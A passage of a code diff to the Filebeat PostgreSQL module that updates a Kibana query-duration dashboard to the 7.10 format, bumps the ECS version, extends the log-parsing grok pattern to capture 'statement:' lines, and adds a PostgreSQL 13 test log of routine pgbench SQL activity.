"3", + "panelRefName": "panel_2", + "version": "7.10.0" + } + ], + "timeRestore": false, + "title": "[Filebeat PostgreSQL] Query Duration Overview ECS", + "version": 1 + }, + "id": "e4c5f230-87f3-11e7-ad9c-db80de0bf8d3-ecs", + "migrationVersion": { + "dashboard": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchId": "PostgreSQL Query Durations-ecs", - "title": "Query count and cumulated duration [Filebeat PostgreSQL] ECS", - "uiStateJSON": { - "vis": { - "colors": { - "Number of queries": "#0A437C", - "Sum of query duration": "#6ED0E0" - }, - "legendOpen": true - } - }, - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "3", - "params": { - "customInterval": "2h", - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1 - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "4", - "params": { - "customLabel": "Number of queries" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Sum of query duration", - "field": "event.duration" - }, - "schema": "metric", - "type": "sum" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "@timestamp per 3 hours" - }, - "type": "category" - } - ], - "grid": { - "categoryLines": false, - "style": { - "color": "#eee" - } - }, - "legendPosition": "right", - "seriesParams": [ - { - "data": { - "id": "4", - "label": "Number of queries" - }, - "drawLinesBetweenPoints": true, - "interpolate": "linear", - "lineWidth": 2, - "mode": "normal", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - }, - { - "data": { - "id": "2", - "label": "Sum of query duration" - }, - "drawLinesBetweenPoints": true, - "interpolate": "linear", - "lineWidth": 2, - "mode": "normal", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "" - }, - "type": "value" - } - ] - }, - "title": "Query count and cumulated duration [Filebeat PostgreSQL] ECS", - "type": "histogram" + "id": "PostgreSQL Query Count and Duration-ecs", + "name": "panel_0", + "type": "visualization" + }, + { + "id": "Slow PostgreSQL Queries-ecs", + "name": "panel_1", + "type": "search" + }, + { + "id": "PostgreSQL Query Durations-ecs", + "name": "panel_2", + "type": "search" + } + ], + "type": "dashboard", + "updated_at": "2021-03-17T16:18:35.298Z", + "version": "WzI1NywxXQ==" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } } - }, - "id": "PostgreSQL Query Count and Duration-ecs", - "type": "visualization", - "version": 1 - }, + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Query count and cumulated duration [Filebeat PostgreSQL] ECS", + "uiStateJSON": { + "vis": { + "colors": { + "Number of queries": "#0A437C", + "Sum of query duration": "#6ED0E0" + }, + "legendOpen": true + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "3", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-15m", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "4", + "params": { + "customLabel": "Number of queries" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Sum of query duration", + "field": "event.duration" + }, + "schema": "metric", + "type": "sum" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "@timestamp per 3 hours" + }, + "type": "category" + } + ], + "grid": { + "categoryLines": false, + "style": { + "color": "#eee" + } + }, + "labels": { + "show": false + }, + "legendPosition": "right", + "seriesParams": [ + { + "data": { + "id": "4", + "label": "Number of queries" + }, + "drawLinesBetweenPoints": true, + "interpolate": "linear", + "lineWidth": 2, + "mode": "normal", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + }, + { + "data": { + "id": "2", + "label": "Sum of query duration" + }, + "drawLinesBetweenPoints": true, + "interpolate": "linear", + "lineWidth": 2, + "mode": "normal", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "" + }, + "type": "value" + } + ] + }, + "title": "Query count and cumulated duration [Filebeat PostgreSQL] ECS", + "type": "histogram" + } + }, + "id": "PostgreSQL Query Count and Duration-ecs", + "migrationVersion": { + "visualization": "7.10.0" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - "postgresql.log.query" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "index": "filebeat-*", - "query": { - "language": "kuery", - "query": "event.duration>30000000" - }, - "version": true - } - }, - "sort": [ - "@timestamp", - "desc" - ], - "title": "Slow Queries [Filebeat PostgreSQL] ECS", - "version": 1 - }, - "id": "Slow PostgreSQL Queries-ecs", - "type": "search", - "version": 1 - }, + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, { - "attributes": { - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - "postgresql.log.query" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "index": "filebeat-*", - "query": { - "language": "kuery", - "query": "event.duration:*" - }, - "version": true - } - }, - "sort": [ - "@timestamp", - "desc" - ], - "title": "Query Durations [Filebeat PostgreSQL] ECS", - "version": 1 - }, - "id": "PostgreSQL Query Durations-ecs", - "type": "search", - "version": 1 - }, + "id": "PostgreSQL Query Durations-ecs", + "name": "search_0", + "type": "search" + } + ], + "type": "visualization", + "updated_at": "2021-03-17T16:24:41.475Z", + "version": "WzI3MSwxXQ==" + }, + { + "attributes": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "event.dataset:\"postgresql.log\" AND event.duration\u003e30000000" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Slow Queries [Filebeat PostgreSQL] ECS", + "version": 1 + }, + "id": "Slow PostgreSQL Queries-ecs", + "migrationVersion": { + "search": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "search", + "updated_at": "2021-03-17T16:25:43.870Z", + "version": "WzI4NSwxXQ==" + }, + { + "attributes": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "event.dataset:\"postgresql.log\" AND event.duration:*" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Query Durations [Filebeat PostgreSQL] ECS", + "version": 1 + }, + "id": "PostgreSQL Query Durations-ecs", + "migrationVersion": { + "search": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "description": "Dashboard for analyzing the query durations of the Filebeat PostgreSQL module", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "query": { - "language": "kuery", - "query": "postgresql.log.query:*" - }, - "version": true - } - }, - "optionsJSON": { - "darkTheme": false - }, - "panelsJSON": [ - { - "col": 1, - "id": "PostgreSQL Query Count and Duration-ecs", - "panelIndex": 1, - "row": 1, - "size_x": 6, - "size_y": 3, - "type": "visualization" - }, - { - "col": 7, - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - "postgresql.log.query" - ], - "id": "Slow PostgreSQL Queries-ecs", - "panelIndex": 2, - "row": 1, - "size_x": 6, - "size_y": 3, - "sort": [ - "@timestamp", - "desc" - ], - "type": "search" - }, - { - "col": 1, - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - "postgresql.log.query" - ], - "id": "PostgreSQL Query Durations-ecs", - "panelIndex": 3, - "row": 4, - "size_x": 12, - "size_y": 5, - "sort": [ - "@timestamp", - "desc" - ], - "type": "search" - } - ], - "timeRestore": false, - "title": "[Filebeat PostgreSQL] Query Duration Overview ECS", - "uiStateJSON": {}, - "version": 1 - }, - "id": "e4c5f230-87f3-11e7-ad9c-db80de0bf8d3-ecs", - "type": "dashboard", - "version": 1 + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" } - ], - "version": "6.0.0-beta1-SNAPSHOT" + ], + "type": "search", + "updated_at": "2021-03-17T16:23:19.900Z", + "version": "WzI2NCwxXQ==" + } + ], + "version": "7.10.0" } diff --git a/filebeat/module/postgresql/log/config/log.yml b/filebeat/module/postgresql/log/config/log.yml index c33a4ad8de4..30e165d6282 100644 --- a/filebeat/module/postgresql/log/config/log.yml +++ b/filebeat/module/postgresql/log/config/log.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/postgresql/log/ingest/pipeline-log.yml b/filebeat/module/postgresql/log/ingest/pipeline-log.yml index 3ca507d58ba..250d346b814 100644 --- a/filebeat/module/postgresql/log/ingest/pipeline-log.yml +++ b/filebeat/module/postgresql/log/ingest/pipeline-log.yml @@ -4,7 +4,7 @@ processors: field: raw_message ignore_missing: true patterns: - - '^(\[%{NUMBER:process.pid:long}(-%{BASE16FLOAT:postgresql.log.session_line_number:long})?\] ((\[%{USERNAME:user.name}\]@\[%{POSTGRESQL_DB_NAME:postgresql.log.database}\]|%{USERNAME:user.name}@%{POSTGRESQL_DB_NAME:postgresql.log.database}) )?)?%{WORD:log.level}: (?:%{POSTGRESQL_ERROR:postgresql.log.sql_state_code}|%{SPACE})(duration: %{NUMBER:temp.duration:float} ms %{POSTGRESQL_QUERY_STEP}: %{GREEDYDATA:postgresql.log.query}|: %{GREEDYDATA:message}|%{GREEDYDATA:message})' + - '^(\[%{NUMBER:process.pid:long}(-%{BASE16FLOAT:postgresql.log.session_line_number:long})?\] ((\[%{USERNAME:user.name}\]@\[%{POSTGRESQL_DB_NAME:postgresql.log.database}\]|%{USERNAME:user.name}@%{POSTGRESQL_DB_NAME:postgresql.log.database}) )?)?%{WORD:log.level}: (?:%{POSTGRESQL_ERROR:postgresql.log.sql_state_code}|%{SPACE})(duration: %{NUMBER:temp.duration:float} ms( %{POSTGRESQL_QUERY_STEP}: %{GREEDYDATA:postgresql.log.query})?|statement: %{GREEDYDATA:postgresql.log.query}|: %{GREEDYDATA:message}|%{GREEDYDATA:message})' pattern_definitions: GREEDYDATA: |- (.| diff --git a/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log new file mode 100644 index 00000000000..2755525218c --- /dev/null +++ b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log @@ -0,0 +1,235 @@ +2021-03-17 15:18:00.201 UTC [149] postgres@postgres LOG: statement: CREATE DATABASE accounts; +2021-03-17 15:18:00.631 UTC [149] postgres@postgres LOG: duration: 430.394 ms +2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: duration: 0.559 ms +2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:18:02.737 UTC [151] postgres@accounts LOG: duration: 4.812 ms +2021-03-17 15:18:02.738 UTC [151] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: duration: 1.900 ms +2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:02.741 UTC [151] postgres@accounts LOG: duration: 1.444 ms +2021-03-17 15:18:02.741 UTC [151] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 1.336 ms +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: begin +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 0.068 ms +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.656 ms +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.538 ms +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: duration: 0.304 ms +2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 1.510 ms +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.094 ms +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.056 ms +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.052 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.050 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.052 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.052 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: duration: 239.763 ms +2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: statement: commit +2021-03-17 15:18:03.054 UTC [151] postgres@accounts LOG: duration: 67.302 ms +2021-03-17 15:18:03.057 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: duration: 15.246 ms +2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:18:03.076 UTC [151] postgres@accounts LOG: duration: 3.531 ms +2021-03-17 15:18:03.077 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:18:03.157 UTC [151] postgres@accounts LOG: duration: 80.735 ms +2021-03-17 15:18:03.158 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: duration: 0.893 ms +2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: duration: 5.266 ms +2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: duration: 2.807 ms +2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:18:03.249 UTC [151] postgres@accounts LOG: duration: 81.593 ms +2021-03-17 15:18:04.110 UTC [154] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:04.130 UTC [154] postgres@accounts LOG: duration: 20.521 ms +2021-03-17 15:18:04.132 UTC [154] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: duration: 11.098 ms +2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: duration: 8.950 ms +2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: duration: 4.302 ms +2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:18:04.163 UTC [154] postgres@accounts LOG: duration: 6.999 ms +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: begin +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: duration: 0.676 ms +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.247 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.164 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.080 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.077 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.074 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.069 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.072 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: duration: 188.620 ms +2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: statement: commit +2021-03-17 15:18:04.366 UTC [154] postgres@accounts LOG: duration: 11.135 ms +2021-03-17 15:18:04.366 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: duration: 16.594 ms +2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:18:04.386 UTC [154] postgres@accounts LOG: duration: 3.410 ms +2021-03-17 15:18:04.386 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:18:04.466 UTC [154] postgres@accounts LOG: duration: 79.842 ms +2021-03-17 15:18:04.466 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:18:04.467 UTC [154] postgres@accounts LOG: duration: 0.907 ms +2021-03-17 15:18:04.468 UTC [154] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:18:04.471 UTC [154] postgres@accounts LOG: duration: 3.192 ms +2021-03-17 15:18:04.471 UTC [154] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:18:04.473 UTC [154] postgres@accounts LOG: duration: 2.332 ms +2021-03-17 15:18:04.473 UTC [154] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:18:04.545 UTC [154] postgres@accounts LOG: duration: 71.641 ms +2021-03-17 15:18:05.633 UTC [170] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:18:05.634 UTC [170] postgres@postgres LOG: duration: 1.095 ms +2021-03-17 15:18:15.868 UTC [185] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:18:15.869 UTC [185] postgres@postgres LOG: duration: 1.125 ms +2021-03-17 15:18:18.861 UTC [187] postgres@accounts LOG: statement: select count(*) from pgbench_branches +2021-03-17 15:18:18.863 UTC [187] postgres@accounts LOG: duration: 1.694 ms +2021-03-17 15:18:18.863 UTC [187] postgres@accounts LOG: statement: select o.n, p.partstrat, pg_catalog.count(i.inhparent) from pg_catalog.pg_class as c join pg_catalog.pg_namespace as n on (n.oid = c.relnamespace) cross join lateral (select pg_catalog.array_position(pg_catalog.current_schemas(true), n.nspname)) as o(n) left join pg_catalog.pg_partitioned_table as p on (p.partrelid = c.oid) left join pg_catalog.pg_inherits as i on (c.oid = i.inhparent) where c.relname = 'pgbench_accounts' and o.n is not null group by 1, 2 order by 1 asc limit 1 +2021-03-17 15:18:18.867 UTC [187] postgres@accounts LOG: duration: 4.281 ms +2021-03-17 15:18:18.868 UTC [187] postgres@accounts LOG: statement: vacuum pgbench_branches +2021-03-17 15:18:18.882 UTC [187] postgres@accounts LOG: duration: 13.791 ms +2021-03-17 15:18:18.883 UTC [187] postgres@accounts LOG: statement: vacuum pgbench_tellers +2021-03-17 15:18:18.884 UTC [187] postgres@accounts LOG: duration: 1.842 ms +2021-03-17 15:18:18.886 UTC [187] postgres@accounts LOG: statement: truncate pgbench_history +2021-03-17 15:18:18.897 UTC [187] postgres@accounts LOG: duration: 11.270 ms +2021-03-17 15:18:19.012 UTC [188] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:19.012 UTC [188] postgres@accounts LOG: duration: 5.739 ms +2021-03-17 15:18:19.012 UTC [188] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 1113 WHERE aid = 92718; +2021-03-17 15:18:19.016 UTC [188] postgres@accounts LOG: duration: 3.784 ms +2021-03-17 15:18:19.021 UTC [188] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 92718; +2021-03-17 15:18:19.021 UTC [188] postgres@accounts LOG: duration: 0.372 ms +2021-03-17 15:18:19.021 UTC [188] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 1113 WHERE tid = 2; +2021-03-17 15:18:19.022 UTC [188] postgres@accounts LOG: duration: 0.902 ms +2021-03-17 15:18:19.022 UTC [188] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 1113 WHERE bid = 1; +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: duration: 0.407 ms +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (2, 1, 92718, 1113, CURRENT_TIMESTAMP); +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: duration: 0.384 ms +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: statement: END; +2021-03-17 15:18:19.025 UTC [188] postgres@accounts LOG: duration: 1.814 ms +2021-03-17 15:18:19.600 UTC [189] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:19.600 UTC [189] postgres@accounts LOG: duration: 0.267 ms +2021-03-17 15:18:19.600 UTC [189] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 4043 WHERE aid = 81209; +2021-03-17 15:18:19.602 UTC [189] postgres@accounts LOG: duration: 2.114 ms +2021-03-17 15:18:19.602 UTC [189] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 81209; +2021-03-17 15:18:19.603 UTC [189] postgres@accounts LOG: duration: 0.261 ms +2021-03-17 15:18:19.603 UTC [189] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 4043 WHERE tid = 7; +2021-03-17 15:18:19.603 UTC [189] postgres@accounts LOG: duration: 0.728 ms +2021-03-17 15:18:19.604 UTC [189] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 4043 WHERE bid = 1; +2021-03-17 15:18:19.604 UTC [189] postgres@accounts LOG: duration: 0.699 ms +2021-03-17 15:18:19.605 UTC [189] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (7, 1, 81209, 4043, CURRENT_TIMESTAMP); +2021-03-17 15:18:19.605 UTC [189] postgres@accounts LOG: duration: 0.518 ms +2021-03-17 15:18:19.605 UTC [189] postgres@accounts LOG: statement: END; +2021-03-17 15:18:19.610 UTC [189] postgres@accounts LOG: duration: 4.495 ms +2021-03-17 15:18:20.137 UTC [190] 